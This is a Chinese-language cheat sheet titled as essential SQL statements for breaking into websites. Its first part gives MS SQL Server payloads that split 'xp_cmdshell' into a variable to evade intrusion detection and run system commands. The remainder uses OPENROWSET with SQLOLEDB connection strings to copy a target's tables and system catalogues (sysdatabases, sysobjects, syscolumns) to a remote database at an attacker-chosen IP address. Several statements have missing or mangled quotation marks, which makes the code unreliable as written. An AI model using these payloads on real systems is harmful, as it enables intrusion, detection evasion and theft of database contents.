入侵网站必备Sql语句:(经典语句)

核心提示： 绕过IDS的检测[使用变量];declare @a sysname set @a=xp_+cmdshellexec @a dir c:;declare @a sysname set @a=xp+_cm’+’dshell exec @adir c:1、 开启远程数据库

绕过IDS的检测[使用变量]

;declare @a sysname set @a=xp_+cmdshell

exec @a dir c:

;declare @a sysname set @a=xp+_cm’+’dshell exec @a

dir c:

1、 开启远程数据库

基本语法

select * from

OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )

参数: (1) OLEDB Provider name

2、 其中连接字符串参数可以是任何端口用来连接,比如

select * from
OPENROWSET(SQLOLEDB, uid=sa;pwd= 123;Network=DBMSSOCN;Address=192.168.0.1,1433;,
select * from table

3.复制目标主机的整个数据库

insert所有远程表到本地表。

基本语法：

insert into OPENROWSET(SQLOLEDB,

server=servername;uid=sa;pwd=123, select * from table1) select * from table2

这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口，指向需要的地方，比如：

insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=
192.168.0.1,1433;,select * from table1) select * from table2
insert into
OPENROWSET(SQLOLEDB,uid=sa;pwd=
123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from
_sysdatabases)
select * from master.dbo.sysdatabases
insert
into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=
192.168.0.1,1433;,select * from _sysobjects)
select * from
user _database.dbo.sysobjects
insert into
OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=
192.168.0.1,1433;,select * from _syscolumns)
select * from
user _database.dbo.syscolumns